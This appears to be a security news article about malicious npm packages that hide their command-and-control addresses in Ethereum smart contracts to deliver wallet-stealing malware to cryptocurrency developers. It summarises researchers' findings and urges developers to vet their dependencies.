The software supply chain is under attack, and the latest threat involves malicious npm packages targeting Ethereum smart contracts. Cybersecurity researchers have uncovered a sophisticated campaign where these packages exploit smart contracts to conceal command-and-control (C2) infrastructure and deliver malware, endangering cryptocurrency developers and users. This novel tactic represents an evolving threat, according to firms like ReversingLabs, Checkmarx, and Socket, who have been at the forefront of discovering and analyzing these attacks.
The Players Involved
The perpetrators are sophisticated threat actors employing advanced social engineering and deception techniques. These actors are adept at creating seemingly legitimate packages and repositories to lure unsuspecting developers. Cybersecurity firms, including ReversingLabs, Checkmarx, and Socket, have been instrumental in uncovering and analyzing these attacks. Researchers such as Lucija Valentić and Karlo Zanki from ReversingLabs have specifically highlighted the unique methods employed by these threat actors.
The primary targets are crypto developers. Attackers often lure them through fake GitHub repositories designed to appear as legitimate cryptocurrency trading tools. These repositories are meticulously crafted to mimic genuine projects, making it difficult for developers to distinguish between safe and malicious code.
Attack Timeline and Tactics
The malicious campaign has been ongoing for nearly a year, with new packages appearing regularly. Researchers identified two new malicious npm packages, “colortoolsv2” and “mimelib2,” uploaded to the npm registry in July 2025. These packages, along with others like “jest-fet-mock” (discovered in November 2024) and “nodejs-smtp” (uploaded in April 2025), function as downloaders. Instead of embedding malicious URLs directly, they leverage Ethereum smart contracts to store and retrieve the addresses of C2 servers, which then deliver second-stage malware payloads to compromised systems.
This innovative use of blockchain technology makes detection significantly harder. The malicious infrastructure is hidden within seemingly legitimate blockchain code, allowing traffic to appear normal. This evasion technique represents a significant evolution in software supply chain attacks.
Ethereum Smart Contract Abuse
A key element of this attack is the abuse of Ethereum smart contracts. The attackers store the addresses of their command-and-control (C2) servers within these contracts. This approach provides several advantages for the attackers:
- Decentralization: The C2 infrastructure is distributed across the blockchain, making it difficult to shut down.
- Immutability: Once the addresses are stored in the smart contract, they cannot be easily altered or removed.
- Obfuscation: The malicious URLs are hidden within the blockchain code, making them harder to detect using traditional security measures.
Scope and Impact
The attacks span across the npm registry, where the malicious packages are hosted, and GitHub, which is used to promote these packages through deceptive means. The Ethereum blockchain serves as the clandestine host for the C2 infrastructure, storing the URLs for the malware payloads. The malware ultimately targets developers’ systems, with some variants affecting Windows, Linux, and macOS environments. Specifically, some variants target desktop cryptocurrency wallets like Atomic and Exodus on Windows, according to security reports.
ReversingLabs’ 2025 Software Supply Chain Security report documented 23 crypto-related malicious campaigns in 2024 alone, indicating a persistent and evolving threat landscape. This data underscores the severity and increasing frequency of these types of attacks.
Motivation and Deception
The primary motivation behind these attacks is to compromise developer systems, install downloader malware, and ultimately steal cryptocurrencies and sensitive data. Threat actors are constantly innovating their distribution and evasion strategies, and the use of Ethereum smart contracts offers a resilient, decentralized, and immutable C2 infrastructure that is difficult to shut down or detect using traditional security measures.
Attackers exploit the trust associated with open-source repositories and the desire of developers for convenient tools, particularly in the lucrative cryptocurrency space. They create fake GitHub repositories, often masquerading as popular cryptocurrency trading bots (e.g., “solana-trading-bot-v2”, “ethereum-mev-bot-v2”), complete with fabricated commits, multiple fake maintainer accounts, and polished documentation to appear credible.
The Evolving Threat Landscape
The use of malicious npm packages represents a significant evolution in supply chain attack strategies. Developers are being tricked into downloading and integrating these packages into their projects through sophisticated social engineering tactics. Once incorporated, the malicious code executes, fetching and installing second-stage malware. For instance, “nodejs-smtp” can unpack legitimate wallet applications, inject malicious code to redirect cryptocurrency transactions, and repackage them. This process allows attackers to intercept and divert funds from unsuspecting users.
This new attack vector makes traditional detection and mitigation approaches less effective and poses a severe risk to software supply chains, developer machines, and potentially even CI/CD systems. Cybersecurity experts emphasize the critical need for developers to thoroughly vet every library they consider implementing, looking beyond superficial metrics like stars or downloads. According to The Hacker News, a more rigorous approach to dependency management is essential to mitigate these risks.
Conclusion
The threat of malicious npm packages exploiting Ethereum smart contracts is a serious and evolving concern for cryptocurrency developers. By using sophisticated social engineering tactics and innovative methods to conceal their command-and-control infrastructure, attackers are able to compromise developer systems and steal valuable cryptocurrencies. As highlighted by ReversingLabs and other cybersecurity firms, vigilance, thorough vetting of dependencies, and a proactive approach to security are essential to protect against these increasingly sophisticated attacks.
